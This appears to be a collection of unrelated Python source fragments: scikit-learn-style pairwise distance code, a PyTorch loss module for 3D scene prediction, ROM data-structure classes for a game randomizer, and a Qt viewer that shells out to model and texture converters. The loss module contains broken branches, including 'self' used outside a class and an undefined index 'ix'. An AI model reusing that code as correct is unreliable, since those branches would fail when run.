should take two arrays from X as input and return a value indicating
the distance between them.
n_jobs : int
The number of jobs to use for the computation. This works by breaking
down the pairwise matrix into n_jobs even slices and computing them in
parallel.
If -1 all CPUs are used. If 1 is given, no parallel computing code is
used at all, which is useful for debugging. For n_jobs below -1,
(n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but one
are used.
**kwds : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
D : array [n_samples_a, n_samples_a] or [n_samples_a, n_samples_b]
A distance matrix D such that D_{i, j} is the distance between the
ith and jth vectors of the given matrix X, if Y is None.
If Y is not None, then D_{i, j} is the distance between the ith array
from X and the jth array from Y.
"""
if (metric not in _VALID_METRICS and
not callable(metric) and metric != "precomputed"):
raise ValueError("Unknown metric %s. "
"Valid metrics are %s, or 'precomputed', or a "
"callable" % (metric, _VALID_METRICS))
if metric == "precomputed":
X, _ = check_pairwise_arrays(X, Y, precomputed=True)
return X
elif metric in PAIRWISE_DISTANCE_FUNCTIONS:
func = PAIRWISE_DISTANCE_FUNCTIONS[metric]
elif callable(metric):
func = partial(_pairwise_callable, metric=metric, **kwds)
else:
if issparse(X) or issparse(Y):
raise TypeError("scipy distance metrics do not"
" support sparse matrices.")
dtype = bool if metric in PAIRWISE_BOOLEAN_FUNCTIONS else None
X, Y = check_pairwise_arrays(X, Y, dtype=dtype)
if n_jobs == 1 and X is Y:
return distance.squareform(distance.pdist(X, metric=metric,
**kwds))
func = partial(distance.cdist, metric=metric, **kwds)
return _parallel_pairwise(X, Y, func, n_jobs, **kwds)
def _return_float_dtype(X, Y):
"""
1. If dtype of X and Y is float32, then dtype float32 is returned.
2. Else dtype float is returned.
"""
if not issparse(X) and not isinstance(X, np.ndarray):
X = np.asarray(X)
if Y is None:
Y_dtype = X.dtype
elif not issparse(Y) and not isinstance(Y, np.ndarray):
Y = np.asarray(Y)
Y_dtype = Y.dtype
else:
Y_dtype = Y.dtype
if X.dtype == Y_dtype == np.float32:
dtype = np.float32
else:
dtype = np.float
return X, Y, dtype
def _parallel_pairwise(X, Y, func, n_jobs, **kwds):
"""Break the pairwise matrix in n_jobs even slices
and compute them in parallel"""
if n_jobs < 0:
n_jobs = max(cpu_count() + 1 + n_jobs, 1)
if Y is None:
Y = X
if n_jobs == 1:
# Special case to avoid picklability checks in delayed
return func(X, Y, **kwds)
# TODO: in some cases, backend='threading' may be appropriate
fd = delayed(func)
ret = Parallel(n_jobs=n_jobs, verbose=0)(
fd(X, Y[s], **kwds)
for s in gen_even_slices(Y.shape[0], n_jobs))
return np.hstack(ret)
def _pairwise_callable(X, Y, metric, **kwds):
"""Handle the callable case for pairwise_{distances,kernels}
"""
X, Y = check_pairwise_arrays(X, Y)
if X is Y:
# Only calculate metric for upper triangle
out = np.zeros((X.shape[0], Y.shape[0]), dtype='float')
iterator = | |
'''
Loss building blocks.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import math
from absl import flags
import numpy as np
import pdb
import itertools
from ..utils import suncg_parse
# from ..utils import quatUtils
# -------------- flags -------------#
# ----------------------------------#
flags.DEFINE_float('shape_loss_wt', 1, 'Shape loss weight.')
flags.DEFINE_float('scale_loss_wt', 1, 'Scale loss weight.')
flags.DEFINE_float('quat_loss_wt', 1, 'Quat loss weight.')
flags.DEFINE_float('trans_loss_wt', 1, 'Trans loss weight.')
flags.DEFINE_float('delta_trans_loss_wt', 1, 'Delta Trans loss weight.')
flags.DEFINE_float('rel_trans_loss_wt', 1,
'Relative location loss weight.')
flags.DEFINE_float('rel_quat_loss_wt', 1,
'Relative location loss weight.')
flags.DEFINE_boolean('rel_opt', False,
'rel optim to locations')
flags.DEFINE_integer('auto_rel_opt', -1,
'rel optim to locations and scale after half epochs')
flags.DEFINE_boolean('train_var', False,
'Train variance for the GMM')
kernel = Variable(torch.FloatTensor([[[0.006, 0.061, 0.242, 0.383, 0.242, 0.061, 0.006]]])).cuda()
# kernel = Variable(
# torch.FloatTensor([[[0.00, 0.0, 0.0, 1, 0.0, 0.00, 0.00]]])).cuda()
class LeastSquareOpt:
def __init__(self):
self.Adict = {}
self.lmbda = 1
def get_matrix_Ab(self, n_objects, trans_location, relative_locations):
lmbda = self.lmbda
b = []
# b = torch.cat([relative_locations, trans_location], dim=0)
for i in range(n_objects):
for j in range(n_objects):
if i == j:
continue
b.append(relative_locations[i*n_objects + j])
for j in range(n_objects):
b.append(trans_location[j])
b = torch.stack(b)
if n_objects in self.Adict.keys():
return self.Adict[n_objects], b
else:
A = np.zeros((n_objects*n_objects, n_objects))
index = 0
for i in range(n_objects):
for j in range(n_objects):
if i == j:
continue
A[index][i] = -1
A[index][j] = 1
index += 1
for i in range(n_objects):
A[index][i] = lmbda*1
index += 1
AtAInvAt = np.matmul(np.linalg.inv(np.matmul(A.transpose(), A)), A.transpose())
self.Adict[n_objects] = Variable(torch.from_numpy(AtAInvAt).float().cuda())
return self.Adict[n_objects], b
def normalize_probs(probs):
return probs/torch.sum(probs, dim=-1, keepdim=True,)
def quat_nll_loss_or(quat_pred, quat_gt):
loss = []
quat_gt_tensor = quat_gt.data.cpu()
quat_pred = quat_pred.exp() + 1E-5
for i in range(len(quat_gt)):
mask = torch.zeros(len(quat_pred)) + 1
mask = mask.scatter_(0, quat_gt_tensor, 0)
mask.scatter_(0, quat_gt[i].data.cpu(), 1)
mask = Variable(mask.cuda())
quat_probs = normalize_probs(quat_pred*mask) + 1E-5
gt_probs = Variable(torch.zeros(len(quat_pred)).scatter_(0, quat_gt[i].data.cpu(), 1)).cuda()
loss.append(-1*quat_probs[quat_gt[i]].log())
loss = -1*torch.nn.functional.max_pool1d(-1*torch.stack(loss).view(1,1, -1), kernel_size=len(quat_gt))
return loss
def quat_nll_loss_and(quat_pred, quat_gt, class_weights=None):
loss = []
quat_gt_tensor = quat_gt.data.cpu()
# quat_pred = quat_pred.exp() + 1E-5
gts = 0*quat_pred.data
gts.scatter_(0, quat_gt.data, 1.0/len(quat_gt))
if class_weights is None:
loss = -1*(Variable(gts)* quat_pred ).sum()
else:
loss = -1*(Variable(gts)* quat_pred*class_weights).sum()
return loss
def quat_loss(q1, q2, average=True):
'''
Anti-podal squared L2 loss.
Args:
q1: N X 4
q2: N X 4
Returns:
loss : scalar
'''
# return quat_loss_geo(q1,q2, average)
q_diff_loss = (q1 - q2).pow(2).sum(1)
q_sum_loss = (q1 + q2).pow(2).sum(1)
q_loss, _ = torch.stack((q_diff_loss, q_sum_loss), dim=1).min(1)
if average:
return q_loss.mean()
else:
return q_loss
def dir_loss1(q1, q2, average=True):
loss = torch.acos(torch.clamp(torch.sum(q1*q2, dim=1), -1 + 1E-5, 1 - 1E-5))
if average:
loss = loss.mean()
# if loss.data[0] < 1E-2:
# pdb.set_trace()
# print(loss.data[0])
return loss
else:
return loss
def dir_loss2(q1, q2, average=True):
return torch.sum((q1 - q2)**2, 1).mean()
def dir_loss(q1, q2, average=True):
dot_p = 1 - torch.sum(q1*q2, dim=1)
if average:
loss = dot_p.mean()
# if loss.data[0] < 1E-2:
# pdb.set_trace()
# print(loss.data[0])
return loss
else:
return dot_p
# dot_p = torch.sum(q1 *q2, dim=1)
# if average:
# return dot_p.mean()
# else:
# return dot_p
def nll_loss_with_mask(log_probs, gts, mask):
'''
Mask some of the examples
'''
bins = log_probs.size(-1)
mask_expanded = mask.unsqueeze(1).expand(log_probs.size())
log_probs_sel = torch.masked_select(log_probs, mask_expanded)
log_probs_sel = log_probs_sel.view(-1, bins)
gts_sel = torch.masked_select(gts, mask)
loss = Variable(torch.Tensor([0]).type_as(log_probs_sel.data))
if len(gts_sel) > 0:
loss = torch.nn.functional.nll_loss(log_probs_sel, gts_sel)
return loss
def quat_dist(q1, q2):
'''
N x M x 4, N x M x 4
'''
return torch.acos(torch.clamp(2*(q1*q2).sum(-1).pow(2) -1, -1, 1))
def dir_dist(q1, q2):
'''
N x M x 4, N x M x 4
'''
dot = (q1*q2).sum(-1)
return torch.acos(torch.clamp(dot, -1, 1))
def code_loss(
code_pred, code_gt, rois,
relative_pred, relative_gt, bIndices_pairs,
class_pred, class_gt,
quat_medoids = None, direction_medoids=None,
pred_class=False, pred_voxels=True, classify_rot=True, classify_dir=True, classify_trj=True, pred_relative=False,
shape_wt=1.0, scale_wt=1.0, quat_wt=1.0, trans_wt=1.0, rel_trans_wt=1.0, rel_quat_wt=1.0, class_wt=1.0,
lsopt=None, rel_opt=False, class_weights=None, opts=None):
'''
Code loss
Args:
code_pred: [shape, scale, quat, trans, delta_trans]
code_gt: [shape, scale, quat, trans]
trajectories_pred : [ n x n x 10 x 3]
Returns:
total_loss : scalar
'''
if opts is None:
gmm_rot = False
var_gmm_rot = False
train_var = False
gmm_dir = False
else:
gmm_rot = False
var_gmm_rot = opts.var_gmm_rot
train_var = opts.train_var
gmm_dir = opts.gmm_dir
if pred_voxels:
s_loss = torch.nn.functional.binary_cross_entropy(code_pred['shape'],
code_gt['shape'])
else:
# print('Shape gt/pred mean : {}, {}'.format(code_pred[0].mean().data[0], code_gt[0].mean().data[0]))
s_loss = (code_pred['shape'] - code_gt['shape']).pow(2).mean()
if classify_rot and not gmm_rot:
q_loss = []
for code_pred_quat, code_gt_quat in zip(code_pred['quat'], code_gt['quat']):
q_loss.append(quat_nll_loss_or(code_pred_quat, code_gt_quat))
q_loss = torch.stack(q_loss).mean()
# pdb.set_trace()
# q_loss = torch.nn.functional.nll_loss(torch.nn.functional.log_softmax(code_pred[2]), code_gt[2])
# assert torch.abs(q_loss - q_loss2).data.cpu().sum() < 1E-4, 'Something incorrect in computation {} , {}'.format(q_loss.data[0], q_loss2.data[0])
elif var_gmm_rot:
assert quat_medoids is not None, 'Quat medoids not passed, cannot compute'
expected_log_var = math.log((2*3.14/180)**2)
one_by_sqrt_2pi_log = math.log(float(np.sqrt(1.0/(2*np.pi))))
mixture_weights, log_variances = code_pred['quat']
mixture_weights= torch.nn.functional.log_softmax(mixture_weights).exp()
# pdb.set_trace()
nll = []
if not train_var:
log_variances = log_variances * 1 + 0*expected_log_var
# pdb.set_trace()
for mixture_weight, log_variance, code_gt_quat in zip(mixture_weights, log_variances, code_gt['quat']):
qd = quat_dist(code_gt_quat.unsqueeze(1) , quat_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
log_variance = log_variance.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_log - 0.5*log_variance - qd/(1E-8 + 2*log_variance.exp())
log_prob = torch.log((mixture_weight*per_mixture_prob.exp()).sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
q_loss = torch.cat(nll).mean()
elif gmm_rot:
assert quat_medoids is not None, 'Quat medoids not passed, cannot compute'
sigmasq = (2*3.14/180)**2
one_by_sqrt_2pi_sigmasq = float(np.sqrt(1.0/(2*np.pi*(sigmasq))))
log_one_by_sqrt_2pi_sigmasq = float(np.log(np.sqrt(1.0/(2*np.pi*(sigmasq)))))
# for code_pred_quat, code_gt_quat
mixture_weights = torch.nn.functional.log_softmax(code_pred['quat']).exp()
nll = []
for mixture_weight, code_gt_quat in zip(mixture_weights, code_gt['quat']):
qd = quat_dist(code_gt_quat.unsqueeze(1) , quat_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_sigmasq*mixture_weight*torch.exp(- qd/(1E-8 + 2*sigmasq))
log_prob = torch.log(per_mixture_prob.sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
q_loss = torch.cat(nll).mean()
# pdb.set_trace()
else:
q_loss = quat_loss(code_pred['quat'], code_gt['quat'])
class_loss = 0*q_loss
if pred_class:
class_loss = torch.nn.functional.nll_loss(class_pred, class_gt)
sc_loss = (code_pred['scale'].log() - code_gt['scale'].log()).abs().mean()
tr_loss = (code_pred['trans'] - code_gt['trans']).pow(2).mean()
## batchify data and compute losses for examples:
if rel_opt:
## For translations.
trans_locations_batched = suncg_parse.batchify(code_pred['trans'], rois[:,0].data)
relative_trans_pred_batched = suncg_parse.batchify(relative_pred['relative_trans'], bIndices_pairs)
relative_trans_gt_batched = suncg_parse.batchify(relative_gt['relative_trans'], bIndices_pairs)
new_locs = []
# for locations, relative_locations in zip(trans_locations_batched, relative_trans_gt_batched):
for locations, relative_locations in zip(trans_locations_batched, relative_trans_pred_batched):
A, b = lsopt.get_matrix_Ab(len(locations), locations, relative_locations)
locations = torch.matmul(A, b)
new_locs.append(locations)
new_locs = torch.cat(new_locs, dim=0)
tr_loss += (new_locs - code_gt['trans']).pow(2).mean()
## For scales.
scales_batched = suncg_parse.batchify(code_pred['scale'].log(), rois[:,0].data)
relative_scales_pred_batched = suncg_parse.batchify(relative_pred['relative_scale'], bIndices_pairs)
relative_scales_gt_batched = suncg_parse.batchify(relative_gt['relative_scale'], bIndices_pairs)
new_scales = []
for scales, relative_scales in zip(scales_batched, relative_scales_pred_batched):
A, b = lsopt.get_matrix_Ab(len(scales), scales, relative_scales)
scales = torch.matmul(A, b)
new_scales.append(scales)
new_scales = torch.cat(new_scales, dim=0)
# pdb.set_trace()
sc_loss += (new_scales - code_gt['scale'].log()).abs().mean()
# tr_loss = torch.nn.functional.smooth_l1_loss(code_pred[3], code_gt[3])
rel_trans_loss = torch.zeros(1).cuda().mean()
rel_scale_loss = torch.zeros(1).cuda().mean()
rel_q_loss = torch.zeros(1).cuda().mean()
if pred_relative:
rel_trans_loss = (relative_pred['relative_trans'] - relative_gt['relative_trans']).pow(2).mean()
rel_scale_loss = (relative_pred['relative_scale'] - relative_gt['relative_scale']).abs().mean()
mask = relative_gt['relative_mask'].bool()
if classify_dir and not gmm_dir:
relative_dir_gt = relative_gt['relative_dir']
relative_pred_sel = torch.masked_select(relative_pred['relative_dir'], mask.unsqueeze(1).expand(relative_pred['relative_dir'].size()))
relative_pred_sel = relative_pred_sel.view(-1, relative_pred['relative_dir'].size(1))
# pdb.set_trace()
relative_gt_sel = [relative_dir_gt[i] for i, m in enumerate(mask) if m.item() == 1]
# if len(relative_pred_sel) > 0:
rel_q_loss = []
for pred_dir, gt_dir in zip(relative_pred_sel, relative_gt_sel):
rel_q_loss.append(quat_nll_loss_or(pred_dir, gt_dir))
rel_q_loss = torch.stack(rel_q_loss).mean()
# relative_gt_sel = torch.masked_select(torch.cat(relative_dir_gt), mask)
# if len(relative_pred_sel) > 0:
# rel_q_loss = torch.nn.functional.nll_loss(torch.nn.functional.log_softmax(relative_pred_sel), relative_gt_sel)
elif gmm_dir:
assert direction_medoids is not None, 'Quat medoids not passed, cannot compute'
expected_log_var = math.log((2*3.14/180)**2)
one_by_sqrt_2pi_log = math.log(float(np.sqrt(1.0/(2*np.pi))))
mixture_weights, rel_dir_log_variances = relative_pred['relative_dir']
size_rel = mixture_weights.size()
mixture_weights = torch.masked_select(mixture_weights, mask.unsqueeze(1).expand(size_rel))
mixture_weights = mixture_weights.view(-1, size_rel[1])
rel_dir_log_variances = torch.masked_select(rel_dir_log_variances, mask.unsqueeze(1).expand(size_rel))
rel_dir_log_variances = rel_dir_log_variances.view(-1, size_rel[1])
mixture_weights= torch.nn.functional.log_softmax(mixture_weights).exp()
trans_rotation = self.relative_gt['relative_dir']
trans_rotation = [trans_rotation[i] for i, m in enumerate(mask) if m.data[0] == 1]
# rel_dir_log_variances = 0*rel_dir_log_variances + 1*expected_log_var
rel_dir_log_variances = 1*rel_dir_log_variances + 0*expected_log_var
nll = []
for mixture_weight, log_variance, gt_trans_rot in zip(mixture_weights, rel_dir_log_variances, trans_rotation):
qd = dir_dist(gt_trans_rot.unsqueeze(1) , direction_medoids.unsqueeze(0)).pow(2)
mixture_weight = mixture_weight.unsqueeze(0).expand(qd.size())
log_variance = log_variance.unsqueeze(0).expand(qd.size())
per_mixture_prob = one_by_sqrt_2pi_log - 0.5*log_variance - qd/(1E-8 + 2*log_variance.exp())
log_prob = torch.log((mixture_weight*per_mixture_prob.exp()).sum(-1) + 1E-6)
log_prob = log_prob.mean()
nll.append(-1*log_prob)
rel_q_loss = torch.cat(nll).mean()
else:
relative_pred_sel = torch.masked_select(relative_pred['relative_dir'], mask.unsqueeze(1).expand(relative_pred[3].size()))
relative_pred_sel = relative_pred_sel.view(-1, relative_pred['relative_dir'].size(1))
# relative_pred_sel = torch.nn.functional.normalize(relative_pred_sel)
# pdb.set_trace()
relative_gt_sel = [relative_gt['relative_dir'][ix] for i, m in enumerate(mask) if m.data[0] == 1]
# if len(relative_pred_sel) > 0:
# trans_rotation = torch.cat(trans_rotation)
# relative_gt_sel = torch.masked_select(trans_rotation, mask.unsqueeze(1).expand(trans_rotation.size()))
# relative_gt_sel = relative_gt_sel.view(-1, trans_rotation.size(1))
if len(relative_pred_sel) > 0:
rel_q_loss = dir_loss1(relative_pred_sel, relative_gt_sel, average=True)
# rel_q_loss = dir_loss2(relative_pred_sel, relative_gt_sel, average=True)
# pdb.set_trace()
# rel_q_loss = rel_q_loss.mean()
total_loss = sc_loss * scale_wt
total_loss += q_loss * quat_wt
total_loss += tr_loss * trans_wt
total_loss += s_loss * shape_wt
if pred_relative:
total_loss += rel_trans_loss * rel_trans_wt
total_loss += rel_scale_loss * rel_trans_wt
total_loss += rel_q_loss
total_loss += class_loss * class_wt
loss_factors = {
'shape': s_loss * shape_wt, 'scale': sc_loss * scale_wt,
| |
<reponame>HansGR/WorldsCollide
from functools import total_ordering
@total_ordering
class DataPointer:
def __init__(self, address, data_address):
self.address = address
self.data_address = data_address
def __eq__(self, other):
return ((self.data_address, self.address) == (other.data_address, other.address))
def __lt__(self, other):
return ((self.data_address, self.address) < (other.data_address, other.address))
# pointers to data
# number of pointers and pointer addresses do not change, only the data addresses they store change
class DataPointers:
def __init__(self, rom, start_address, end_address, pointer_size):
self.rom = rom
self.start_address = start_address
self.end_address = end_address
self.pointer_size = pointer_size
self.max_address = 2 ** (self.pointer_size * 8) - 1
self.pointers = []
pointer_count = self.size() // self.pointer_size
for index in range(pointer_count):
pointer_address = self.start_address + index * self.pointer_size
if self.pointer_size == 4:
# four byte pointers are stored as pairs of 2 bytes (e.g. 0x12345678 stored as 0x34127856)
half_pointer_size = self.pointer_size // 2
data_address_bytes = self.rom.get_bytes(pointer_address, half_pointer_size)
data_address_high = int.from_bytes(data_address_bytes, byteorder="little")
data_address_bytes = self.rom.get_bytes(pointer_address + half_pointer_size, half_pointer_size)
data_address_low = int.from_bytes(data_address_bytes, byteorder="little")
data_address = (data_address_high << 16) | data_address_low
else:
data_address_bytes = self.rom.get_bytes(pointer_address, self.pointer_size)
data_address = int.from_bytes(data_address_bytes, byteorder="little")
pointer = DataPointer(pointer_address, data_address)
self.pointers.append(pointer)
def size(self):
# equivalent to len(self) * self.pointer_size
return self.end_address - self.start_address + 1
def __len__(self):
return len(self.pointers)
def __getitem__(self, index):
return self.pointers[index].data_address
def __setitem__(self, index, data_address):
self.pointers[index].data_address = data_address
def write(self):
if self.pointer_size == 4:
# write out four byte pointers as pairs of 2 bytes (e.g. 0x12345678 as 0x34127856)
half_pointer_size = self.pointer_size // 2
for pointer in self.pointers:
data_address_high = (pointer.data_address >> 16).to_bytes(half_pointer_size, "little")
data_address_low = (pointer.data_address & 0xffff).to_bytes(half_pointer_size, "little")
self.rom.set_bytes(pointer.address, data_address_high)
self.rom.set_bytes(pointer.address + half_pointer_size, data_address_low)
else:
for pointer in self.pointers:
self.rom.set_bytes(pointer.address, pointer.data_address.to_bytes(self.pointer_size, "little"))
class DataElement:
def __init__(self, data, address):
self.data = data
self.address = address
# contiguous bit field
class DataBits:
def __init__(self, rom, start_address, end_address):
self.rom = rom
self.start_address = start_address
self.end_address = end_address
self.bytes = self.rom.get_bytes(self.start_address, self.size())
def size(self):
return self.end_address - self.start_address + 1
def set_all(self):
for byte_index in range(self.size()):
self.bytes[byte_index] = 0xff
def clear_all(self):
for byte_index in range(self.size()):
self.bytes[byte_index] = 0x00
def __len__(self):
return self.size() * 8
def __getitem__(self, index):
byte_index = index // 8
bit_index = index % 8
return (self.bytes[byte_index] >> bit_index) & 1
def __setitem__(self, index, value):
byte_index = index // 8
bit_index = index % 8
self.bytes[byte_index] = (self.bytes[byte_index] & ~(1 << bit_index)) | (value << bit_index)
def __str__(self):
result = ""
for byte in self.bytes:
for bit_index in range(8):
if (1 << bit_index) & byte:
result += "1"
else:
result += "0"
result += " "
return result
def write(self):
self.rom.set_bytes(self.start_address, self.bytes)
# array of data
# all elements are the same size and the size does not change but the number of elements can change
class DataArray:
def __init__(self, rom, start_address, end_address, element_size):
self.rom = rom
self.start_address = start_address
self.end_address = end_address
self.element_size = element_size
self.elements = []
self.element_capacity = self.size() // self.element_size
for index in range(self.element_capacity):
data_address = self.start_address + index * self.element_size
data = self.rom.get_bytes(data_address, self.element_size)
element = DataElement(data, data_address)
self.elements.append(element)
def size(self):
# equivalent to len(self) * self.element_size
return self.end_address - self.start_address + 1
def __len__(self):
return len(self.elements)
def __getitem__(self, index):
return self.elements[index].data
def __setitem__(self, index, data):
assert(len(data) == self.element_size)
self.elements[index].data = data
def __delitem__(self, index):
del self.elements[index]
self.end_address -= self.element_size
def append(self, data):
assert(len(data) == self.element_size)
self.elements.append(DataElement(data, self.end_address))
self.end_address += self.element_size
def write(self):
if len(self) > self.element_capacity:
raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({len(self)}/{self.element_capacity} elements)")
for element in self.elements:
self.rom.set_bytes(element.address, element.data)
# pointers to arrays of data
# each array pointed to can be zero or more elements long and each element is the same size
# the number of pointers/arrays does not change but the array sizes can change
class DataArrays:
def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, data_start_address, data_end_address, data_element_size):
self.rom = rom
self.pointers = DataPointers(rom, pointers_start_address, pointers_end_address, pointer_size)
self.start_address = data_start_address
self.end_address = data_end_address
self.element_size = data_element_size
self.data_arrays = []
for index in range(len(self)):
start_address = self.start_address + self.pointers[index]
if index < len(self) - 1:
end_address = self.start_address + self.pointers[index + 1]
else:
end_address = self.end_address
data_array = DataArray(self.rom, start_address, end_address, self.element_size)
self.data_arrays.append(data_array)
def size(self):
return self.end_address - self.start_address + 1
def __len__(self):
# equivalent to len(self.data_arrays) after initialization
return len(self.pointers)
def __getitem__(self, index):
return self.data_arrays[index]
def write(self):
data_address = self.start_address
for index in range(len(self)):
self.pointers[index] = data_address - self.start_address
for element in self.data_arrays[index].elements:
self.rom.set_bytes(data_address, element.data)
data_address += self.element_size
if data_address > self.end_address:
raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({(data_address - self.start_address + 1) // self.element_size - 1}/{len(self)} elements)")
self.pointers.write()
# pointers to blocks of data
# pointers are all the same size but data blocks can vary in size (or all be the same size)
# the number of pointers/blocks does not change but the sizes of blocks can change
#
# DataList: pointers are in the same order as they blocks they point to
# each block's index is the same as the index of the pointer pointing to it
#
# DataMap: pointers are not in the same order as the blocks they point to
# pointers must be sorted to find the size of each block
#
# DataList:
# pointer index: 0 1 2 3 4
# ---------------------
# block index: | 0 | 1 | 2 | 3 | 4 |
# ---------------------
# pointer 0 points to block 0, pointer 1 points to block 1, pointer 2 points to block 2, ...
# NOTE: DataList can also handle pointers which wrap around (i.e. dialogs)
# e.g. pointer 0 = 0xfffe (block 0 address = 0x0dfffe), pointer 1 = 0x000c (block 1 address = 0x0e000c)
#
# DataMap:
# pointer index: 0 1 2 3 4
# ---------------------
# block index: | 4 | 3 | 1 | 2 | 0 |
# ---------------------
# pointer 0 points to block 4, pointer 1 points to block 3, pointer 2 points to block 1, ...
class _DataBlocks:
def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address):
self.rom = rom
self.pointers = DataPointers(rom, pointers_start_address, pointers_end_address, pointer_size)
self.pointer_offset = pointer_offset
self.data_blocks = [None] * len(self)
self.start_address = data_start_address
self.end_address = data_end_address
self.free_space = 0
def size(self):
return self.end_address - self.start_address + 1
def __len__(self):
# equivalent to len(self.data_blocks) after initialization
return len(self.pointers)
def __getitem__(self, index):
return self.data_blocks[index]
def __setitem__(self, index, data):
# NOTE: every pointer after given index must be updated making this an O(n) operation
# use assign to overwrite every data_block without O(n^2) complexity
size_delta = len(self.data_blocks[index]) - len(data)
self.data_blocks[index] = data
if size_delta == 0:
return
self.free_space += size_delta
for pointer_index in self.sorted_indices[index + 1:]:
self.pointers[pointer_index] -= size_delta
def assign(self, data_blocks):
address = self.start_address - self.pointer_offset
for index, pointer_index in enumerate(self.sorted_indices):
self.pointers[pointer_index] = address % (self.pointers.max_address + 1)
if pointer_index < len(data_blocks):
self.data_blocks[pointer_index] = data_blocks[pointer_index]
address += len(data_blocks[pointer_index])
else:
self.data_blocks[pointer_index] = []
self.free_space = self.end_address - (address + self.pointer_offset) + 1
def write(self):
if self.free_space < 0:
raise MemoryError(f"{self.__class__.__name__} write(): Not enough space ({self.free_space} bytes)")
self.pointers.write()
start_address = self.pointer_offset
for index, pointer_index in enumerate(self.sorted_indices):
if index > 0:
prev_pointer_index = self.sorted_indices[index - 1]
if self.pointers[pointer_index] < self.pointers[prev_pointer_index]:
start_address += self.pointers.max_address + 1 # pointer wrap around
block_address = start_address + self.pointers[pointer_index]
self.rom.set_bytes(block_address, self.data_blocks[pointer_index])
def __str__(self):
result = f"{len(self.pointers)} pointers [{hex(self.pointers.start_address)}, {hex(self.pointers.end_address)}]\n"
result += f"{len(self.data_blocks)} blocks [{hex(self.start_address)}, {hex(self.end_address)}]"
result += f", {self.free_space} free bytes\n"
return result
def __repr__(self):
result = [""] * len(self)
start_address = self.pointer_offset
for index, pointer_index in enumerate(self.sorted_indices):
if index > 0:
prev_pointer_index = self.sorted_indices[index - 1]
if self.pointers[pointer_index] < self.pointers[prev_pointer_index]:
start_address += self.pointers.max_address + 1 # pointer wrap around
result[pointer_index] = f"{pointer_index}: {len(self.data_blocks[pointer_index])}, {hex(start_address + self.pointers[pointer_index])}: {[hex(x) for x in self.data_blocks[pointer_index]]}"
result = '\n'.join(result)
return str(self) + result
def print(self):
print(str(self))
def printr(self):
print(repr(self))
class DataList(_DataBlocks):
def __init__(self, rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address):
super().__init__(rom, pointers_start_address, pointers_end_address, pointer_size, pointer_offset, data_start_address, data_end_address)
# pointers already sorted by address, create list of indices for base class convenience
self.sorted_indices = list(range(len(self)))
# original unused pointers can point beyond end address + 1, fix this first
start_address = self.pointer_offset
for index in range(len(self)):
address = start_address + self.pointers[index]
if address > self.end_address + 1:
self.pointers[index] = (self.end_address + 1) % (self.pointers.max_address + 1)
if index > 0 and self.pointers[index] | |
+= self.size_scale * dy
if self.scaleImage < 0:
self.scaleImage = 0.0
self.resize_image()
self.lastPos = event.pos()
def resize_image(self):
new_pix = vpPixmap.scaled(viewport.size()*self.scaleImage,
aspectMode=Qt.KeepAspectRatio)
self.resize(new_pix.size())
c = viewport.rect().center()
self.setPixmap(new_pix)
self.move(c.x() - self.width() / 2 + self.xOff,
c.y() - self.height() / 2 + self.yOff)
class ImageParent(QLabel):
def resizeEvent(self, size):
vpImage.reset_view()
def mouseDoubleClickEvent(self, event):
vpImage.mouseDoubleClickEvent(event)
def wheelEvent(self, event):
vpImage.wheelEvent(event)
def mouseMoveEvent(self, event):
vpImage.mouseMove(event)
def mousePressEvent(self, event):
vpImage.lastPos = event.pos()
vpIBase = ImageParent(parent=viewport)
vpImage = ImageView(parent=vpIBase)
vpImage.setPixmap(QPixmap(1,1))
vpPixmap = QPixmap()
vpFilename = QLabel("\n", parent=viewport)
vpFilename.setAlignment(Qt.AlignTop)
vpFilename.setFont(QFont("", 7))
vpFilename.setAutoFillBackground(True)
vpFilename.setStyleSheet("background-color: white")
vpTopLayout.setSpacing(0)
vpTopLayout.setContentsMargins(0, 0, 0, 0)
vpTopLayout.addWidget(vpFilename, 0)
vpLayout.addWidget(vp3D)
vpLayout.addWidget(vpIBase)
vpTopLayout.addLayout(vpLayout, 1)
def convert_model(source, destination):
int_ext = file_name.split(".")[-1]
ext = destination.split(".")[-1]
if os.path.isfile(source):
if ext == "bin":
shutil.copyfile(source, destination)
if int_ext != "apx":
return 0
else:
return -1
if int_ext == "apx":
if ext != "stl":
destination = destination[:-3] + "obj"
if ext == "bin":
destination = destination[:-3] + "apb"
res = subprocess.call([lpath+"tools\\Models\\XEPA2model.exe",
source, destination],
shell=False)
else:
log = open("blender_convert.log", "w")
res = subprocess.call([blender, "-b", "-Y", "--addons",
"io_scene_DeusEx-MD", "-P",
lpath+"\\tools\\blender_script.py", "--",
source, destination],
shell=False, stdout=log)
log.close()
return res
def convert_image(source, destination):
ext = destination.split(".")[-1]
if os.path.isfile(source):
if ext == "tex":
shutil.copyfile(source, destination)
return 0
else:
return -1
res = subprocess.call([tex_converter, source,
tpath+"texture.dds"],
shell=False)
if res == 0 and ext == "dds":
shutil.copyfile(tpath+"texture.dds", destination)
return 0
if res == 0 and ext != "dds":
if os.path.isfile(tpath+"texture."+ext):
os.remove(tpath+"texture."+ext)
#tif / png / tga / jpg
conf_name = os.path.dirname(tex_converter) + "/config.txt"
def set_tex_conf(path, ext):
conf = open(path, "w")
conf.write(r"""verbose = false
recursive = false
clean = true
merge_gloss = true
format = """)
conf.write(ext)
conf.close()
if os.path.isfile(conf_name):
conf_file = open(conf_name, "r")
conf = conf_file.readlines()
conf_file.close()
for line in conf:
if line[:6] == "format" and line != "format = "+ext+"\n":
set_tex_conf(conf_name, ext)
break
else:
set_tex_conf(conf_name, ext)
for file in os.listdir(os.path.dirname(tex_converter)):
